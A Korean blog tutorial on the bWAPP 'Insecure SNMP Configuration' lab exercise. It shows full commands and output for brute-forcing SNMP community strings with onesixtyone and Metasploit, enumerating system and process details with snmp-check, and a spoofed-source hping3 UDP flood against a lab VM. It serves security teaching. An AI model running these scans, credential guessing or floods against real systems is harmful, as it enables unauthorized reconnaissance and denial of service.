정보보안(구버전)/ bWAPP 2019. 2. 16. 13:13

웹 해킹 bWAPP - 72. A5 - Security Misconfiguration - Insecure SNMP Configuration

 

 

본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다. 

 

 

1. Security Misconfiguration

 

 - OWASP Top10 A5 - 잘못된 보안 구성
 - 서버/시스템/DB/네트워크 장비/웹 설정 요류로 인하여 발생하는 취약점이다.
 - Ex) 디렉토리 리스팅, 에러페이지, 웹페이지 주석, 웹서버 기본 설정, Adobe Flash 취약점, DoS/DDos 공격,

         특정 서비스에 대한 Reverse_TCP 공격, 로컬 권한 취약점, 백업/임시/robots 파일


 

 

2. Insecure SNMP Configuration

 

 - SNMP는 매니저와 에이전트 간에 사전 공유키 개념인 커뮤니티 값이 기본값이거나 평문으로 전송되는 문제점이 있다.

 - 이를 통해서 공격자가 커뮤니티 값을 획득하여 시스템/장비들에 대한 정보 확인 및 명령을 수행하는 취약점이 있다.

 - 또한, SNMP 메세지를 통해서 Dos/DDos 공격이 가능한 취약점이 있다.


 

 

3. Security Misconfiguration - Insecure SNMP Configuration

 

 - 이 시나리오는 SNMP 커뮤니티 및 SNMP 메세지를 이용한 시스템 정보를 획득하는 내용이다.

 

 

Ex1) Security Misconfiguration - Insecure SNMP Configuration 이해 I

 

 

보안 레벨 선택 및 시나리오 선택

 

 

 

Hint : 연결/실행된 HTTP 프로세스를 열거하여라...?

 

 

 

bWAPP에 SNMP 설치 실시

bee@bee-box:/var/www/bWAPP$ sudo apt-get install snmp
[sudo] password for bee: bug
Reading package lists... Done
Building dependency tree      
Reading state information... Done
The following NEW packages will be installed:
  snmp
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 158kB of archives.
After this operation, 582kB of additional disk space will be used.
WARNING: The following packages cannot be authenticated!
  snmp
Install these packages without verification [y/N]? y
Get:1 http://old-releases.ubuntu.com hardy/main snmp 5.4.1~dfsg-4ubuntu4 [158kB]
Fetched 158kB in 1s (96.4kB/s)                          
Selecting previously deselected package snmp.
(Reading database ... 105451 files and directories currently installed.)
Unpacking snmp (from .../snmp_5.4.1~dfsg-4ubuntu4_i386.deb) ...
Setting up snmp (5.4.1~dfsg-4ubuntu4) ... 

 

 

 

bWAPP snmp 정보 확인 실시

bee@bee-box:~$ snmpwalk -Os -c public -v 1 localhost system
sysDescr.0 = STRING: Linux bee-box 2.6.24-16-generic #1 SMP Thu Apr 10 13:23:42 UTC 2008 i686
sysObjectID.0 = OID: netSnmpAgentOIDs.10
sysUpTimeInstance = Timeticks: (2826951) 7:51:09.51
sysContact.0 = STRING: Your master bee
sysName.0 = STRING: bee-box
sysLocation.0 = STRING: Every bee needs a home!
sysORLastChange.0 = Timeticks: (16) 0:00:00.16
sysORID.1 = OID: snmpFrameworkMIBCompliance
sysORID.2 = OID: snmpMPDCompliance
sysORID.3 = OID: usmMIBCompliance
sysORID.4 = OID: snmpMIB
sysORID.5 = OID: tcpMIB
sysORID.6 = OID: ip
sysORID.7 = OID: udpMIB
sysORID.8 = OID: vacmBasicGroup
sysORDescr.1 = STRING: The SNMP Management Architecture MIB.
sysORDescr.2 = STRING: The MIB for Message Processing and Dispatching.
sysORDescr.3 = STRING: The management information definitions for the SNMP User-based Security Model.
sysORDescr.4 = STRING: The MIB module for SNMPv2 entities
sysORDescr.5 = STRING: The MIB module for managing TCP implementations
sysORDescr.6 = STRING: The MIB module for managing IP and ICMP implementations
sysORDescr.7 = STRING: The MIB module for managing UDP implementations
sysORDescr.8 = STRING: View-based Access Control Model for SNMP.
sysORUpTime.1 = Timeticks: (16) 0:00:00.16
sysORUpTime.2 = Timeticks: (16) 0:00:00.16
sysORUpTime.3 = Timeticks: (16) 0:00:00.16
sysORUpTime.4 = Timeticks: (16) 0:00:00.16
sysORUpTime.5 = Timeticks: (16) 0:00:00.16
sysORUpTime.6 = Timeticks: (16) 0:00:00.16
sysORUpTime.7 = Timeticks: (16) 0:00:00.16
sysORUpTime.8 = Timeticks: (16) 0:00:00.16
bee@bee-box:~$ 

 

 

 

와이어샤크 실행 및 eth1 캡처 실시

root@kali:~/slowloris.pl# wireshark &
[2] 1342
 

 

 

 

SNMP 커뮤니티 획득 실시

root@kali:~# cd /usr/share/doc/onesixtyone/

root@kali:/usr/share/doc/onesixtyone# onesixtyone -c dict.txt 192.168.20.205
Scanning 1 hosts, 49 communities
192.168.20.205 [private] Linux bee-box 2.6.24-16-generic #1 SMP Thu Apr 10 13:23:42 UTC 2008 i686
192.168.20.205 [public] Linux bee-box 2.6.24-16-generic #1 SMP Thu Apr 10 13:23:42 UTC 2008 i686 

 

root@kali:/usr/share/doc/onesixtyone# cd
root@kali:~#

 

 

 

커뮤니티 'private' 확인

 

 

 

커뮤니티 'public' 확인

 

 

 

snmp-check를 이용하여 bWAPP 상세 정보 확인

root@kali:~# snmp-check 192.168.20.205 -c public -p 161 | more
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 192.168.20.205:161 using SNMPv1 and community 'public'

 

[*] System information:

 

  Host IP address               : 192.168.20.205
  Hostname                      : bee-box
  Description                   : Linux bee-box 2.6.24-16-generic #1 SMP Thu Apr
 10 13:23:42 UTC 2008 i686
  Contact                       : Your master bee
  Location                      : Every bee needs a home!
  Uptime snmp                   : 08:06:35.25
  Uptime system                 : 08:05:31.02
  System date                   : 2019-2-19 11:13:50.0

 

[*] Network information:

 

  IP forwarding enabled         : no
  Default TTL                   : 64
  TCP segments received         : 2910511
  TCP segments sent             : 265053
--More--

 

~ 중간 생략 ~
 

 

 

 

snmp-check를 이용하여 bWAPP Apaceh2 상세 정보 확인

root@kali:~# snmp-check 192.168.20.205 -c public -p 161 > bWAPP.snmp
root@kali:~# cat bWAPP.snmp | head -101 | tail -3 ; cat bWAPP.snmp | grep apache2
[*] Processes:

  Id                    Status                Name                  Path                  Parameters         
  6892                  runnable              apache2               /usr/sbin/apache2     -k start           
  6895                  runnable              apache2               /usr/sbin/apache2     -k start           
  6898                  runnable              apache2               /usr/sbin/fcgi-pm     -k start           
  7018                  runnable              apache2               /usr/sbin/apache2     -k start           
  7019                  runnable              apache2               /usr/sbin/apache2     -k start           
  7020                  runnable              apache2               /usr/sbin/apache2     -k start           
  7021                  runnable              apache2               /usr/sbin/apache2     -k start           
  7022                  runnable              apache2               /usr/sbin/apache2     -k start           
  9904                  runnable              apache2               /usr/sbin/apache2     -k start           
  9937                  runnable              apache2               /usr/sbin/apache2     -k start           
  9938                  runnable              apache2               /usr/sbin/apache2     -k start           
  9939                  runnable              apache2               /usr/sbin/apache2     -k start           
root@kali:~#

 

 

 

Ex2) Security Misconfiguration - Insecure SNMP Configuration 이해 II

 

 

SNMP 커뮤니티 획득 실시

root@kali:~# msfconsole -q


msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(scanner/snmp/snmp_login) >
msf auxiliary(scanner/snmp/snmp_login) > set rhosts 192.168.20.205
rhosts => 192.168.20.205

 

msf auxiliary(scanner/snmp/snmp_login) > exploit

[!] No active DB -- Credential data will not be saved!
[+] 192.168.20.205:161 - Login Successful: private (Access level: read-write); Proof (sysDescr.0): Linux bee-box 2.6.24-16-generic #1 SMP Thu Apr 10 13:23:42 UTC 2008 i686
[+] 192.168.20.205:161 - Login Successful: public (Access level: read-only); Proof (sysDescr.0): Linux bee-box 2.6.24-16-generic #1 SMP Thu Apr 10 13:23:42 UTC 2008 i686
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf auxiliary(scanner/snmp/snmp_login) >
msf auxiliary(scanner/snmp/snmp_login) >

msf auxiliary(scanner/snmp/snmp_login) > use auxiliary/scanner/snmp/snmp_enum


msf auxiliary(scanner/snmp/snmp_enum) >
msf auxiliary(scanner/snmp/snmp_enum) > set rhosts 192.168.20.205
rhosts => 192.168.20.205
msf auxiliary(scanner/snmp/snmp_enum) > exploit


[+] 192.168.20.205, Connected.

 

[*] System information:

 

Host IP                       : 192.168.20.205
Hostname                      : bee-box
Description                   : Linux bee-box 2.6.24-16-generic #1 SMP Thu Apr 10 13:23:42 UTC 2008 i686
Contact                       : Your master bee
Location                      : Every bee needs a home!
Uptime snmp                   : 09:28:39.48
Uptime system                 : 09:27:35.24
System date                   : 2019-2-19 12:35:54.0

 

~ 중간 생략 ~

 

msf auxiliary(scanner/snmp/snmp_enum) >

msf auxiliary(scanner/snmp/snmp_enum) > use auxiliary/scanner/snmp/snmp_enumusers

msf auxiliary(scanner/snmp/snmp_enumusers) > set rhosts 192.168.20.205
rhosts => 192.168.20.205


msf auxiliary(scanner/snmp/snmp_enumusers) > exploit

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

 

msf auxiliary(scanner/snmp/snmp_enumusers) >quit
root@kali:~#  

 

 

 

 

Ex3) Security Misconfiguration - Insecure SNMP Configuration 이해 III

 

 

bee@bee-box:~$ gnome-system-monitor &
[1] 4342

 

 

bWAPP에서 시스템 모니터링 도구 실행 실시

 

 

 

UDP 플러딩 공격 실시

root@kali:~# hping3 --udp 192.168.20.205 -p 161 -a 1.2.3.4 --flood
HPING 192.168.20.205 (eth1 192.168.20.205): udp mode set, 28 headers + 0 data bytes
hping in flood mode, no replies will be shown

(Ctrl+C)


--- 192.168.20.205 hping statistic ---
1588649 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
root@kali:~# 

 

 

 

BWAPP 부하 발생 확인

 

 

 

[유튜브] 동영상 강의 링크 (구독! 좋아요!!!)

 

웹해킹 72. A5 - bWAPP Security Misconfiguration - Insecure SNMP Configuration   https://youtu.be/33Q4QvDoAU4

Posted by 김정우 강사(카카오톡 : kim10322)
,


Q